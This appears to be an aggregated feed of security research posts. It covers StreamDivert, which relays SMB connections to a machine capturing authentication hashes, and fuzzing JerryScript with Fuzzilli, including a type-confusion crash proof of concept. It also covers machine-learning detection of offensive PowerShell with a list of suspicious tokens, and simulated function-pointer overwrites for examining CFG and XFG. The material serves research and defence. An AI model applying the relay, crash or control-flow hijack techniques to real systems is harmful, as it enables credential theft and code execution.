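rules = [
    RelayRule(445, None, ("10.0.1.50", 445)),           # relay all SMB by default
    RelayRule(445, "10.0.1.0/24", ("10.0.1.60", 445)),  # but this subnet goes elsewhere
]

print(pick_target(rules, "10.0.1.7", 445))
print(pick_target(rules, "192.168.1.1", 445))
print(pick_target(rules, "10.0.1.7", 80))
```

A connection that matches no rule returns `None`, which corresponds to traffic continuing along its normal path.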

Schematically, inbound and outbound relaying look like the following:

Relaying of incoming connections

Relaying of outgoing connections

Note that StreamDivert does this by leveraging the capabilities of an awesome open-source library and kernel driver called WinDivert. Because packets are captured at kernel level, transported to the userland application (StreamDivert), modified, and re-injected into the kernel network stack, we are able to relay network connections regardless of whether anything is actually listening on the local destination port.

The following image demonstrates the relay process where incoming SMB connections are redirected to another machine, which is capturing the authentication hashes.

Example of an SMB connection being diverted and relayed to another server.

StreamDivert source code is open-source on GitHub and its binary releases can be downloaded here.

Detection

StreamDivert (or similar tooling modifying network packets using the WinDivert driver) can be detected based on the following event log entries:

Fuzzing JavaScript Engines with Fuzzilli

8 September 2020 at 22:00

Background

As part of my research at Doyensec, I spent some time trying to understand current fuzzing techniques, which could be leveraged against the popular JavaScript engines (JSE) with a focus on V8. Note that I did not have any prior experience with fuzzing JSEs before starting this journey.

Dharma

My experimentation started with a context-free grammar (CFG) generator: Dharma. I quickly realized that the grammar rules for generating valid JavaScript code that does something interesting are too complicated. Type confusion and JIT engine bugs were my primary focus, however, most of the generated code was syntactically incorrect. Every statement was wrapped in a try/catch block to deal with the incorrect code. After a few days of fuzzing, I was only able to find out-of-memory (OOM) bugs. If you want to read more about V8 JIT and Dharma, I recommend this thoughtful research.

Dharma allows you to specify three sections for various purposes. The first one is called variable and lets you define variables that are later used in the value section. The last one, variance, is commonly used to specify the starting symbol for expanding the CFG tree.

The linkage is implemented inside the value and a nice feature of Dharma is that here you only define the assignment rules or function invocations, and the variables are automatically created when needed. However, if we assign a variable of type A to one with the different type B, we have to include all the type A rules inside the type B object.

Here is an example of such a rule:

try { !TYPEDARRAY! = !ARRAYBUFFER!.slice(!ANY_FUNCTION!, !ANY_FUNCTION!) } catch (e) {};

As you can imagine, without writing an additional library, the code quickly becomes complicated and clumsy.

Fuzzing with coverage is mandatory when targeting popular software, since a pure black-box approach only scratches the surface. Coverage can easily be obtained when the binary is compiled with a specific Clang (compiler frontend, part of the LLVM infrastructure) flag. Part of the output can be seen in the picture below. In my case, it was only useful for manual code review and grammar adjustment, as there was no convenient way to implement a mutator on the JavaScript source code.

Coverage Report for V8

Fuzzilli

As an alternative approach, I started to play with Fuzzilli, which I think is an incredible and still very underrated fuzzer, implemented by Samuel Groß (aka Saelo). Fuzzilli uses an intermediate representation (IR) language called FuzzIL, which is perfectly suited to mutation. Moreover, any program in FuzzIL can always be converted (lifted) to valid JavaScript code.

At that time, the supported targets were V8, SpiderMonkey, and JavaScriptCore. As these engines continuously undergo widespread fuzzing, I instead decided to implement support for a different JavaScript Engine. I was also interested in the communication protocol between the fuzzer and the engine, so I considered expanding this fuzzer to be an excellent exercise.

I decided to add support for JerryScript. In the past years, numerous security issues have been discovered on this target by Fuzzinator, which uses the ANTLR v4 testcase generator Grammarinator. Those bugs were investigated and fixed, so I wanted to see if Fuzzilli could find something new.

Fuzzilli Basics

REPRL

The best available high-level documentation about Fuzzilli is Samuel’s Master’s thesis, where it was introduced. I strongly recommend reading it, as this article only summarizes some of its novel ideas.

Many modern fuzzer architectures use Forkserver. The idea behind it is to run the program until the initialization is complete, but before it processes any input. Right after that, the input from the fuzzer is read and passed to a newly forked child. The overhead is low since the initialization possibly only occurs once, or when a restart is needed (e.g. in the case of continuous memory leaks).

Fuzzilli uses the REPRL approach, which saves the overhead caused by fork(); the measured execution per sample can be ~7 times faster. The JavaScript engine is modified to read the input from the fuzzer, and after it executes the sample, the coverage is collected. The crucial part is resetting the state, which an engine normally does not do, since it keeps the context of the already defined variables. In contrast with the Forkserver, we need a rudimentary knowledge of the engine. It is useful to know how the engine’s string representation is internally implemented in order to feed the input or add additional commands.
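Why the reset step matters can be shown with a toy loop. The sketch below is not Fuzzilli's implementation: Python's `exec` stands in for the JavaScript engine, a dictionary stands in for the engine's global context, and `run_samples` is a name invented for this example.

```python
def run_samples(samples, reset=True):
    """Execute each sample in one long-lived process, optionally resetting state."""
    context = {}
    results = []
    for source in samples:
        if reset:
            context = {}  # the "reset" step: drop everything the last sample defined
        context.pop("result", None)
        try:
            exec(source, context)  # Python's exec stands in for the JavaScript engine
            status = "ok"
        except Exception as exc:
            status = type(exc).__name__
        results.append((status, context.get("result")))
    return results


samples = ["x = 41\nresult = x + 1", "result = x"]
print(run_samples(samples, reset=True))
print(run_samples(samples, reset=False))
```

With the reset, the second sample fails because `x` no longer exists, so each sample behaves the same no matter what ran before it. Without the reset, the second sample silently depends on the first, which would make crashes hard to reproduce from a single input.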

Coverage

LLVM gives a convenient way to obtain edge coverage. By providing the -fsanitize-coverage=trace-pc-guard compiler flag to Clang, we receive pointers to the start and end of the guard region, whose entries are initialized with guard numbers, as can be read in the LLVM documentation:

extern "C" void __sanitizer_cov_trace_pc_guard_init(uint32_t *start,
                                                    uint32_t *stop) {
  static uint64_t N;  // Counter for the guards.
  if (start == stop || *start) return;  // Initialize only once.
  printf("INIT: %p %p\n", start, stop);
  for (uint32_t *x = start; x < stop; x++)
    *x = ++N;  // Guards should start from 1.
}

The guard regions are included in the JSE target. This means that the JavaScript engine must be modified to accommodate these changes. Whenever a branch is executed, the __sanitizer_cov_trace_pc_guard callback is called. Fuzzilli uses a POSIX shared memory object (shmem) to avoid the overhead when passing the data to the parent process. Shmem represents a bitmap, where the visited edge is set and, after each JavaScript input pass, the edge guards are reinitialized.
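The bookkeeping described above can be modelled as follows. This is a simplified sketch, not Fuzzilli's code: a `bytearray` stands in for the shared memory bitmap, the class and method names are invented, and clearing the bitmap after every run is an assumption of this model.

```python
class EdgeCoverage:
    """Toy model of guard-based edge coverage with a bitmap."""

    def __init__(self, num_edges):
        self.guards = [0] * num_edges
        self.bitmap = bytearray((num_edges + 7) // 8)  # stand-in for shared memory
        self.reset_guards()

    def reset_guards(self):
        # Guards are numbered from 1; 0 means "already recorded during this run".
        for i in range(len(self.guards)):
            self.guards[i] = i + 1

    def trace_pc_guard(self, edge):
        guard = self.guards[edge]
        if guard == 0:
            return
        index = guard - 1
        self.bitmap[index // 8] |= 1 << (index % 8)
        self.guards[edge] = 0  # skip this edge until the guards are re-armed

    def finish_run(self, seen):
        """Return edges not seen before, then clear the bitmap and re-arm the guards."""
        hit = {i for i in range(len(self.guards))
               if (self.bitmap[i // 8] >> (i % 8)) & 1}
        new = hit - seen
        seen |= hit
        self.bitmap = bytearray(len(self.bitmap))
        self.reset_guards()
        return new


cov = EdgeCoverage(10)
seen = set()
for edge in (1, 3, 3):
    cov.trace_pc_guard(edge)
first = cov.finish_run(seen)
for edge in (3, 4):
    cov.trace_pc_guard(edge)
second = cov.finish_run(seen)
print(first, second)
```

Zeroing a guard after its first hit keeps the callback cheap for hot edges, and re-arming the guards after each input lets the next sample report its own edges from scratch.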

Generation

We are not going to repeat the program generation algorithms, as they are closely described in the thesis. The surprising fact is that all the programs stem from this simple JavaScript by cleverly applying multiple mutators:

Object()

Integration with JerryScript

To add a new target, several modifications for Fuzzilli should be implemented. From a high level, the REPRL pseudocode is described here.

As we already mentioned, the JavaScript engine must be modified to conform to Fuzzilli’s protocol. To keep the same code standards and logic, we recommend adding a custom command line parameter to the engine. If we decide to run the interpreter without it, it will run normally. Otherwise, it uses the hardcoded descriptor numbers to let the parent know that the interpreter is ready to process our input.

Fuzzilli internally uses a custom command, by default called fuzzilli, which the interpreter should also implement. The first parameter represents the operator - it could be FUZZILLI_CRASH or FUZZILLI_PRINT. The former is used to check if we can intercept the segmentation faults, while the latter (optional) is used to print the output passed as an argument. By design, the fuzzer prevents execution when some checks fail, e.g., the operation FUZZILLI_CRASH is not implemented.

The code is very similar between different targets, as you can see in the patch for JerryScript that we submitted.

For a basic setup, one needs to write a short profile file stored in Sources/FuzzilliCli/Profiles/. Here we can specify additional builtins specific to the engine, arguments, or thanks to the recent contribution from WilliamParks also the ECMAScriptVersion.

Results

By integrating Fuzzilli with JerryScript, Doyensec was able to identify multiple bugs reported over the course of four weeks through GitHub. All of these issues were fixed.

All issues were also added to the Fuzzilli Bug Showcase:

Fuzzilli Showcase

Fuzzilli is by design efficient against targets with JIT compilers. It can abuse the non-linear execution flow by generating nested callbacks, Prototypes or Proxy objects, where the state of a different object could be modified. Samples produced by Fuzzilli are specifically generated to incorporate these properties, as required for the discovery of type confusion bugs.

This behavior could be easily seen in the Issue #3836. As in most cases, the proof of concept generated by Fuzzilli is very simple:

function main() {
var v3 = new Float64Array(6);
var v4 = v3.buffer;
v4.constructor = Uint8Array;
var v5 = new Float64Array(v3);
}
main();

This could be rewritten without changing the semantics to an even simpler code:

var v1 = new Float64Array(6);
v1.buffer.constructor = Uint8Array;
new Float64Array(v1);

The root cause of this issue is described in the fix.

In JavaScript when a typed array like Float64Array is created, a raw binary data buffer could be accessed via the buffer property, represented by the ArrayBuffer type. However, the type was later altered to typed array view Uint8Array. During the initialization, the engine was expecting an ArrayBuffer instead of the typed array. When calling the ecma_arraybuffer_get_buffer function, the typed array pointer was cast to ArrayBuffer. Note that this is possible since the production build’s asserts are removed. This caused the type confusion bug on line 196.

Consequently, the destination buffer dst_buf_p contained an incorrect pointer, as the memory corruption seen during triage in gdb shows:

Program received signal SIGSEGV, Segmentation fault.
ecma_typedarray_create_object_with_typedarray (typedarray_id=ECMA_FLOAT64_ARRAY, element_size_shift=<optimized out>, proto_p=<optimized out>, typedarray_p=0x5555556bd408 <jerry_global_heap+480>)
    at /home/jerryscript/jerry-core/ecma/operations/ecma-typedarray-object.c:655
655	    memcpy (dst_buf_p, src_buf_p, array_length << element_size_shift);
(gdb) x/i $rip
=> 0x55555557654e <ecma_op_create_typedarray+346>:	rep movsb %ds:(%rsi),%es:(%rdi)
(gdb) i r rdi
rdi            0x3004100020008     844704103137288

Some of the issues, including the one mentioned above, could probably be escalated from Denial of Service to Code Execution. Because of time constraints and little added value, we have not tried to implement a working exploit.

I want to thank Saelo for including my JerryScript patch into Fuzzilli. And many thanks to Doyensec for the funded 25% research time, which made this project possible.

Additional References

Machine learning from idea to reality: a PowerShell case study

2 September 2020 at 07:55

Detecting both ‘offensive’ and obfuscated PowerShell scripts in Splunk using Windows Event Log 4104

Author: Joost Jansen

This blog provides a ‘look behind the scenes’ at the RIFT Data Science team and describes the process of moving from the need or an idea for research towards models that can be used in practice. More specifically, how known and unknown PowerShell threats can be detected using Windows event log 4104. In this case study it is shown how research into detecting offensive (with the term ‘offensive’ used in the context of ‘offensive security’) and obfuscated PowerShell scripts led to models that can be used in a real-time environment.

About the Research and Intelligence Fusion Team (RIFT):
RIFT leverages our strategic analysis, data science, and threat hunting capabilities to create actionable threat intelligence, ranging from IOCs and detection capabilities to strategic reports on tomorrow’s threat landscape. Cyber security is an arms race where both attackers and defenders continually update and improve their tools and ways of working. To ensure that our managed services remain effective against the latest threats, NCC Group operates a Global Fusion Center with Fox-IT at its core. This multidisciplinary team converts our leading cyber threat intelligence into powerful detection strategies.

Introduction to PowerShell

PowerShell plays a huge role in a lot of incidents that are analyzed by Fox-IT. During the compromise of a Windows environment almost all actors use PowerShell in at least one part of their attack, as illustrated by the vast list of actors linked to this MITRE technique [1]. PowerShell code is most frequently used for reconnaissance, lateral movement and/or C2 traffic. It lends itself to these purposes, as the PowerShell cmdlets are well-integrated with the Windows operating system and it is installed along with Windows in most recent versions.

The strength of PowerShell can be illustrated with the following example. Consider the privilege-escalation enumeration script PowerUp.ps1 [2]. Although the script itself consists of 4010 lines, it can simply be downloaded and invoked using:

In this case, the script won’t even touch the disk as it’s executed in memory. Since threat actors are aware that there might be detection capabilities in place, they often encode or obfuscate their code. For example, the command executed above can also be run base64-encoded:

which has the exact same result.
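To make the encoding step concrete: PowerShell's -EncodedCommand parameter expects the command as base64 over its UTF-16LE bytes. The sketch below shows that transformation in Python. The helper names are hypothetical, and the command used is a harmless placeholder rather than the one from this post.

```python
import base64


def encode_powershell_command(command):
    """Base64-encode a command the way -EncodedCommand expects (UTF-16LE)."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_powershell_command(encoded):
    """Reverse the encoding, e.g. when inspecting a logged command line."""
    return base64.b64decode(encoded).decode("utf-16-le")


# Placeholder command, chosen only for illustration.
encoded = encode_powershell_command("Write-Output 'hello'")
print(encoded)
print(decode_powershell_command(encoded))
```

The decoding direction is the one that matters for detection: a signature written against the plain-text command will not match the encoded form unless the command line is decoded first.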

Using tools like Invoke-Obfuscation [3], the command and the script itself can be obfuscated even further. For example, the following code snippet from PowerUp.ps1

can also be obfuscated as:

These well-known offensive PowerShell scripts can already be detected by using static signatures, but small modifications in the right place will circumvent the detection. Moreover, these signatures might not detect new versions of the known offensive scripts, let alone detect new techniques. Therefore, there was a need to create models to detect offensive PowerShell scripts regardless of their obfuscation level, as illustrated in Table 1.

Table 1: Detection of different malicious PowerShell scripts

Don’t reinvent the wheel

As we don’t want to re-invent the wheel, we started with a literature study, which revealed that fellow security companies had already performed research on this subject [4, 5]. This was a great starting point for this research. As we prefer easily explainable classification models over complex ones (e.g. the neural networks used in the previous research) and obviously faster models over slower ones, not all parts of the research were applicable. However, large parts of the data gathering & pre-processing phase were reused while the actual features and classification method were changed.

Since detecting offensive & obfuscated PowerShell scripts are separate problems, they require separate training data. For the offensive training data, PowerShell scripts embedded in ‘known bad’ GitHub repositories were scraped. For the obfuscated training data, parts of the Revoke-Obfuscation training data set were used [6]. An equal number of legitimate (‘known not-obfuscated’ and ‘known not-offensive’) scripts were added to the training sets (retrieved from the PowerShell Gallery [7]), resulting in the training sets listed in Table 2.

Table 2: Training set sizes

To keep things simple and explainable the decision was made to base the initial model on token (offensive) and character (obfuscated) percentages. This did require some preprocessing of the scripts (e.g. removing the comments), calculating the features and in the case of the offensive scripts, tokenization of the PowerShell scripts. Figures 1 & 2 illustrate how some characters and tokens are unevenly distributed among the training sets.

Figure 1: Average occurrence of several ASCII characters in obfuscated and not-obfuscated scripts
Figure 2: Average occurrence of several tokens in offensive and not-offensive scripts
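As a rough illustration of the character-percentage features for the obfuscation model, the sketch below strips comments from a script and computes how often selected characters occur. It is a minimal sketch under assumptions, not the code used in this research: the function names are hypothetical, and the comment stripping is naive (it would also cut a # that appears inside a string).

```python
import re
from collections import Counter


def strip_comments(script):
    """Remove <# ... #> block comments and # line comments (naive)."""
    script = re.sub(r"<#.*?#>", "", script, flags=re.DOTALL)
    return re.sub(r"#.*", "", script)


def character_percentages(script, alphabet):
    """Return the share of each character in `alphabet` as a percentage."""
    text = strip_comments(script)
    total = len(text)
    if total == 0:
        return {ch: 0.0 for ch in alphabet}
    counts = Counter(text)
    return {ch: 100.0 * counts[ch] / total for ch in alphabet}


# Placeholder script, chosen only for illustration.
sample = "$a = 'x' # assign\n<# block\ncomment #>Write-Output $a\n"
print(character_percentages(sample, "$'`"))
```

A dictionary like this, computed per script, can be turned into one row of the feature matrix that is fed to the classifier.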

The percentages were then used as features for a supervised classification model to train, along with some additional features based on known bad tokens (e.g. base64, iex and convert) and several regular expression patterns. Afterwards all features and labels were fed to our SupervisedClassification helper class, which is used in many of our projects to standardize the process of (synthetic) sampling of training data, DataFrame transformations, model selection and several other tasks. For both models, the SupervisedClassification class selected the Random Forest algorithm for the classifying task. Figure 3 summarizes the workflow for the obfuscated PowerShell model.

Figure 3: High-level overview of the training process for the obfuscation model

Usage in practice

Since these models were exported, they can be used for multiple purposes by loading the models in Python, feeding PowerShell scripts to them and observing the predicted outcomes. In this example, Splunk was chosen as the platform to use this model because it is part of our Managed Detection & Response service and because of Splunk’s ability to easily run custom Python commands.

Windows is able to log blocks of PowerShell code as it is executed, a feature called ‘PowerShell Script Block Logging’, which can be enabled via GPO or manual registry changes. The logs (identified by Windows Event ID 4104) can then be piped to a Splunk custom command Reconstruct4104Logging, which will process the script blocks back into the format the model was trained on. Afterwards, the reconstructed script is piped into e.g. the ObfuscatedPowershell custom command, which will load the pre-trained model, predict the probabilities for the scripts being obfuscated and return these predictions back to Splunk. This is shown in Figure 4.

Figure 4: Usage of the pre-trained model in Splunk along with the corresponding query

Performance

Back in Splunk some additional tuning can be performed (such as setting the threshold for predicting the positive class to 0.7) to reduce the number of false positives. Using cross-validation, a precision score of 0.94 was achieved with an F1 score of 0.9 for the obfuscated PowerShell model. The performance of the offensive model is not yet as good as the obfuscated model, but since there are many parameters to tune for this model we expect this to improve in the foreseeable future. The confusion matrix for the obfuscated model is shown in Table 3.

Table 3: Confusion matrix
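For readers less familiar with these metrics, the sketch below shows how a probability threshold turns model output into labels, and how precision, recall and F1 follow from confusion-matrix counts. The function names are hypothetical, the counts in the example are made up for illustration and are not the values from Table 3, and treating a probability equal to the threshold as positive is an assumption.

```python
def classify(probabilities, threshold=0.7):
    """Label a script positive when its probability reaches the threshold."""
    return [p >= threshold for p in probabilities]


def precision_recall_f1(tp, fp, fn):
    """Compute precision, recall and F1 from confusion-matrix counts."""
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    if precision + recall == 0:
        return precision, recall, 0.0
    f1 = 2 * precision * recall / (precision + recall)
    return precision, recall, f1


# Illustrative numbers only.
print(classify([0.65, 0.7, 0.9]))
print(precision_recall_f1(tp=8, fp=2, fn=2))
```

Raising the threshold usually trades recall for precision: fewer scripts are flagged, and a larger share of the flagged ones are truly obfuscated.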

Despite the fact that other studies achieve even higher scores, we believe that this relatively simple and easy to understand model is a great first step, for which we can iteratively improve the scores over time. To finish off, these models are included in our Splunk Managed Detection Engine to check for offensive & obfuscated PowerShell scripts at regular intervals.

Conclusion and recommendation

PowerShell, despite being a legitimate and very useful tool, is frequently misused by threat actors for various malicious purposes. Using static signatures, well-known bad scripts can be detected, but small modifications may cause these signatures to be circumvented. To detect modified and/or new PowerShell scripts and techniques, more and better generic models should be researched and eventually be deployed in real-time log monitoring environments. PowerShell logging (including but not limited to the Windows Event Logs with ID 4104) can be used as input for these models. The recommendation is therefore to enable the PowerShell logging in your organization, at least at the most important endpoints or servers. This recommendation, among others, was already present in our whitepaper on ‘Managing PowerShell in a modern corporate environment’ [8] back in 2017 and remains very relevant to this day. Additional information on other defensive measures that can be put into place can also be found in the whitepaper.

References

[1] https://attack.mitre.org/techniques/T1059/001/
[2] https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
[3] https://github.com/danielbohannon/Invoke-Obfuscation
[4] https://arxiv.org/pdf/1905.09538.pdf
[5] https://www.fireeye.com/blog/threat-research/2018/07/malicious-powershell-detection-via-machine-learning.html
[6] https://github.com/danielbohannon/Revoke-Obfuscation/tree/master/DataScience
[7] https://www.powershellgallery.com/
[8] https://www.nccgroup.com/uk/our-research/managing-powershell-in-a-modern-corporate-environment/

Exploit Development: Between a Rock and a (Xtended Flow) Guard Place: Examining XFG

23 August 2020 at 00:00

Introduction

Previously, I have blogged about ROP and the benefits of understanding how it works. Not only is it a viable first-stage payload for obtaining native code execution, but it can also be leveraged for things like arbitrary read/write primitives and data-only attacks. Unfortunately, if your end goal is native code execution, there is a good chance you are going to need to overwrite a function pointer in order to hijack control flow. Taking this into consideration, Microsoft implemented Control Flow Guard, or CFG, as an optional update back in Windows 8.1. Although it was released before Windows 10, it did not really catch on in terms of “mainstream” exploitation until recent years.

After a few years, and a few bypasses along the way, Microsoft decided they needed a new Control Flow Integrity (CFI) solution - hence XFG, or Xtended Flow Guard. David Weston gave an overview of XFG at his talk at BlueHat Shanghai 2019, and it is pretty much the only public information we have at this time about XFG. This “finer-grained” CFI solution will be the subject of this blog post. A few things before we start about what this post is and what it isn’t:

  1. This post is not an “XFG internals” post. I don’t know every single low level detail about it.
  2. Don’t expect any bypasses from this post - this mitigation is still very new and not very explored.
  3. We will spend a bit of time understanding what indirect function calls are via function pointers, what CFG is, and why XFG is a very, very nice mitigation (IMO).

This is simply going to be an “organized brain dump” and isn’t meant to be a “learn everything you need to know about XFG in one sitting” post. This is just simply documenting what I have learned after messing around with XFG for a while now.

The Blueprint for XFG: CFG

CFG is a pretty well documented exploit mitigation, and I have done my fair share of documenting it as well. However, for completeness’ sake, let’s talk about how CFG works and its potential shortcomings.

Note that before we begin, Microsoft deserves recognition for being one of the leaders in implementing a Control Flow Integrity (CFI) initiative and among the first to actually release a CFI solution.

Firstly, to enable CFG, a program is compiled and linked with the /guard:cf flag. This can be done through the Microsoft Visual Studio tool cl (which we will look at later). However, more easily, this can be done by opening Visual Studio and navigating to Project -> Properties -> C/C++ -> Code Generation and setting Control Flow Guard to Yes (/guard:cf)

CFG at this point would now be enabled for the program - or in the case of Microsoft binaries, they would already be CFG enabled (most of them). This causes a bitmap to be created, which essentially is made up of all functions within the process space that are “protected by CFG”. Then, before an indirect function call is made (we will explore what an indirect call is shortly if you are not familiar), the function being called is sent to a special CFG function. This function checks to make sure that the function being called is a part of the CFG bitmap. If it is, the call goes through. If it isn’t, the call fails.
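To make the idea concrete, here is a toy model of that check. This is just a sketch and not how ntdll implements it: the class and function names are hypothetical, the addresses are made up, and tracking one entry per 16-byte slot is a simplification chosen for this model rather than the real bitmap layout.

```python
class CfgBitmap:
    """Toy CFG bitmap: one entry per 16-byte slot of address space."""

    SLOT = 16

    def __init__(self):
        self.slots = set()  # sparse stand-in for the real bitmap

    def mark_valid(self, address):
        """Register a function start address as a valid call target."""
        self.slots.add(address // self.SLOT)

    def is_valid_target(self, address):
        """A target is valid if it is slot-aligned and its slot is marked."""
        return address % self.SLOT == 0 and address // self.SLOT in self.slots


def guarded_call(bitmap, target, functions):
    """Check the target before the indirect call; fail if it is not marked."""
    if not bitmap.is_valid_target(target):
        raise RuntimeError(f"CFG violation: {target:#x} is not a valid target")
    return functions[target]()


# Hypothetical addresses: 0x1000 is a compiled-in function, 0xdb0000 is not.
bitmap = CfgBitmap()
bitmap.mark_valid(0x1000)
functions = {0x1000: lambda: "cfgTest called"}
print(guarded_call(bitmap, 0x1000, functions))
try:
    guarded_call(bitmap, 0xDB0000, functions)
except RuntimeError as err:
    print(err)
```

Note what the check does not look at: it only asks whether the target is marked, not whether it is the function the call site was meant to reach.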

Since this is a post about XFG, not CFG, we will skip over the technical details of CFG. However, if you are interested to see how CFG works at a lower level, Morten Schenk has an excellent post about its implementation in user mode (the Windows kernel has been compiled with CFG, known as kCFG, since Windows 10 1703. Note that Virtualization-Based Security, or VBS, is required for kCFG to be enforced. However, even when VBS is disabled, kCFG has some limited functionality. This is beyond the scope of this blog post).

Moving on, let’s examine how an indirect function call (e.g. call [rax] where RAX contains a function address or a function pointer), which initiates a control flow transfer to a different part of an application, looks without CFG or XFG. To do this, let’s take a look at a very simple program that performs a control flow transfer.

Note that you will need Microsoft Visual Studio 2019 Preview 16.5 or greater in order to follow along.

Let’s talk about what is happening here. Firstly, this code is intentionally written this way and is obviously not the most efficient way to do this. However, it is done this way to help simulate a function pointer overwrite and the benefits of XFG/CFG.

Firstly, we have a function called void cfgTest() that just prints a sentence. This function is then assigned to a function pointer called void (*cfgTest1), which actually is an array. Then, in the main() function, the function pointer void (*cfgTest1) is executed. Since void (*cfgTest1) is pointing to void cfgTest(), this will actually just cause void (*cfgTest1) to execute void cfgTest(). This will create a control flow transfer, as the main() function will perform a call to the void (*cfgTest1) function pointer, which will then call the void cfgTest() function.

To compile with the command line tool cl, type in “x64 Native Tools Command Prompt for VS 2019 Preview” in the Start menu and run the program as an administrator.

This will drop you into a special Command Prompt. From here, you will need to navigate to the installation path of Visual Studio, and you will be able to use the cl tool for compilation.

Let’s compile our program now!

The above command essentially compiles the program with the /Zi flag and the /INCREMENTAL:NO linking option. Per Microsoft Docs, /Zi is used to create a .pdb file for symbols (which will be useful to us). /INCREMENTAL:NO has been set to instruct cl not to use the incremental linker. This is because the incremental linker is essentially used for optimization, which can create things like jump thunks. Jump thunks are essentially small functions that only perform a jump to another function. An example would be, instead of call function1, the program would actually perform a call j_function1. j_function1 would simply be a function that performs a jmp function1 instruction. This functionality will be turned off for brevity. Since our “dummy program” is so simple, it will be optimized very easily. Knowing this, we are disabling incremental linking in order to simulate a “Release” build (we are currently building “Debug” builds) of an application, where incremental linking would be disabled by default. However, none of this is really relevant here - it is just a point of clarification for the reader. Just know we are doing it for our purposes.

The result of the compilation command will place the output file, named Source.exe in this case, into the current directory along with a symbol file (.pdb). Now, we can open this application in IDA (you’ll need to run IDA as an administrator, as the application is in a privileged directory). Let’s take a look at the main() function.

Let’s examine the assembly above. The above function loads the void (*cfgTest1) function pointer into RCX. Since void (*cfgTest1) is a function pointer to an array, the value in RCX itself isn’t what is needed to jump to the array. Only when RCX is dereferenced in the call qword ptr [rcx+rax] instruction does program execution actually perform a control flow transfer to void (*cfgTest1)’s first index - which is void cfgTest(). This is why call qword ptr [rcx+rax] is being performed, as RAX is the position in the array that is being indexed.

Taking a look at the call instruction in IDA, we can see that clearly this will redirect program execution to void cfgTest().

Additionally, in WinDbg, we can see that Source!cfgTest1, which is a function pointer, points to Source!cfgTest.

Nice! We know that our program will redirect execution from main() to void (*cfgTest1) and then to void cfgTest()! Let’s say as an attacker, we had an arbitrary write primitive and we were able to overwrite what void (*cfgTest1) points to. We could actually change where the application actually ends up calling! This is not good from a defensive perspective.

Can we mitigate this issue? Let’s go back and recompile our application with CFG this time and find out.

This time, we add /guard:cf as a flag, as well as a linking option.

Disassembling the main() function in IDA again, we notice things look a bit different.

Very interesting! Instead of making a call directly to void (*cfgTest1) this time, it seems as though the function __guard_dispatch_icall_fptr will be invoked. Let’s set a breakpoint in WinDbg on main() and see how this looks after invoking the CFG dispatch function.

After setting a breakpoint on the main() function, code execution hits the CFG dispatch function.

The CFG dispatch function then performs a dereference and jumps to ntdll!LdrpDispatchUserCallTarget.

We won’t get into the technical details about what happens here, as this post isn’t built around CFG and Morten’s blog already explains what will happen. But essentially, at a high level, this function will check the CFG bitmap for the Source.exe process and determine if the void cfgTest() function is a valid target (a.k.a if it’s in the bitmap). Obviously this function hasn’t been overwritten, so we should have no problems here. After stepping through the function, control flow should transfer back to the void cfgTest() function seamlessly.

Execution has returned to the void cfgTest() function. What is also nice is the lack of overhead that CFG puts on the program itself. The check was very quick because Microsoft opted to use a bitmap instead of indexing an array or some other structure.

You can also see what functions are protected by the CFG bitmap by using the dumpbin tool within the Visual Studio installation directory and the special Visual Studio Command Prompt. You can use the command dumpbin /loadconfig APPLICATION.exe to view this.

Let’s see if we can take this even further and potentially show why XFG is definitely a better/more viable option than CFG.

CFG: Potential Shortcomings

As mentioned earlier, CFG checks functions to make sure they are part of the “CFG bitmap” (a.k.a protected by CFG). This means a few things from an adversarial perspective. If we were to use VirtualAlloc() to allocate some virtual memory, and overwrite a function pointer that is protected by CFG with the returned address of the allocation - CFG would make the program crash.

Why? VirtualAlloc() (for instance) would return a virtual address of something like 0xdb0000. When the application in question was compiled with CFG, obviously this memory address wasn’t a part of the application. Therefore, this address wouldn’t be “protected by CFG” and the program would crash. However, this is not very practical. Let’s think about what an adversary tries to accomplish with ROP.

Adversaries want to return into a Windows API function like VirtualProtect() in order to dynamically change permissions of memory. What is interesting about CFG is that in addition to the program’s functions, all exported Windows functions that make up the “module” import list for a program can be called. For instance, the application we are looking at is called Source.exe. Dumping the loaded modules for the application, we can see that KERNELBASE.dll, kernel32.dll, and ntdll.dll (which are the usual suspects) are loaded for this application.

Let’s see if/how this could be abused!

Let’s firstly update our program with a new function.

This program works exactly as the program before, except the function void protectMe2() is added in to add another user defined function to the CFG bitmap. Note that this function will never be executed, and that is poor from a programmer’s perspective. However, this function’s sole purpose is to just show another protected function. This can be verified again with dumpbin.

Here, we can see that Source!cfgTest1 still points to Source!cfgTest

Let’s recall what was said earlier about how CFG only validates if a function resides within the CFG bitmap or not. Let’s now perform a simulated arbitrary write condition in WinDbg to overwrite what Source!cfgTest1 points to, with Source!protectMe2.

The above command uses x to show the address of the Source!protectMe2 function and then uses dps to show that Source!cfgTest1 still points to Source!cfgTest. Then, using ep, we overwrite the function pointer. dps once again verifies that the function pointer overwrite has occurred.

Let’s now step through the program to see what happens. Program execution firstly hits the CFG dispatch function.

Looking at the RAX register, which is used to hold the address of the function CFG will check, we see it has been overwritten with Source!protectMe2 instead of Source!cfgTest.

Execution then hits ntdll!LdrpDispatchUserCallTarget. After walking the function, which validates if the in scope function resides within the CFG bitmap for the process, execution redirects to Source!protectMe2!

This is very interesting from an adversarial perspective, as we were successfully able to overwrite a function pointer and CFG didn’t terminate our process! The only caveat being that the function is a part of the current process’s CFG bitmap.

What is even more interesting, is that function pointers protected by CFG can be overwritten by any exported function at runtime! Let’s rework this example, but try to call a Windows API function like KERNELBASE!WriteProcessMemory.

First, we simulate the arbitrary write by overwriting Source!cfgTest1 with KERNELBASE!WriteProcessMemory.

Program execution passes through Source!__guard_dispatch_icall_fptr and ntdll!LdrpDispatchUserCallTarget and we can clearly see execution redirects to KERNELBASE!WriteProcessMemory.

This shows that even with CFG enabled, it is still possible to call functions that have overwritten other functions. This is not good, as calls can still be made with malign intent. Additionally, calling functions of different types out of context may result in a type confusion or other programmatic behavioral problems.

Now that we have armed ourselves with an understanding of why CFG is an amazing start to solving the CFI problem, but yet still contains many shortcomings, let’s get into XFG and what makes it better and different.

XFG: The Next Era of CFI for Windows

Let’s start out by talking about what XFG is at a high level. After we go through some high level details about XFG, we will compile our program with XFG and walk through the dispatch function(s), as well as perform some simulated function pointer overwrites to see how XFG reacts and additionally see how XFG differs from CFG.

